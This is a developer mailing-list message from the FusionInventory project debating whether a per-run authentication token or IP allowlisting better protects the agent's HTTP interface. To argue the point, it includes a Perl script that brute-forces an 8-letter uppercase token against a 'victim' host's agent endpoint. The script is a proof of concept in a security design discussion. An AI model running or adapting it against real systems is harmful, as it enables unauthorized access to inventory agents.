[Fusioninventory-devel] Dropping the authentication token
Guillaume Rousse
guillomovitch at gmail.com
Mon Mar 4 11:46:00 UTC 2013
On 04/03/2013 10:46, David DURIEUX wrote:
> On Mon, 04 Mar 2013 10:43:44 +0100
> Guillaume Rousse <guillomovitch at gmail.com> wrote:
>
>> On 04/03/2013 08:40, David DURIEUX wrote:
>>> For security reasons, having a token is safer, and I prefer having a
>>> token to allowing the IP of the server.
>> Prove it.
>
> It's more difficult to get the right token (regenerated at each
> execution of the agent) than to have a computer with the IP of the trusted
> server.
Welcome to the real world.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple qw(get);

# Brute-force an 8-letter upper-case token against the agent's HTTP
# interface: 26^8 (about 2*10^11) requests in the worst case.
my @alphabet = 'A' .. 'Z';
foreach my $a (@alphabet) {
    foreach my $b (@alphabet) {
        foreach my $c (@alphabet) {
            foreach my $d (@alphabet) {
                foreach my $e (@alphabet) {
                    foreach my $f (@alphabet) {
                        foreach my $g (@alphabet) {
                            foreach my $h (@alphabet) {
                                my $token = "$a$b$c$d$e$f$g$h";
                                # get() returns undef unless the server answers 2xx
                                if (defined get("http://victim:62354/now?token=$token")) {
                                    print "look ma, I brute-forced the token: $token\n";
                                    exit;
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
On the other hand, the capacity to spoof an IP address is highly
dependent on the local network configuration.
My point is just that both solutions are differently insecure, with the
token solution more cumbersome to implement. Given that there are
actually very few things an attacker would gain by defeating this
protection anyway, let's keep it simple and stupid.
--
BOFH excuse #338:
old inkjet cartridges emanate barium-based fumes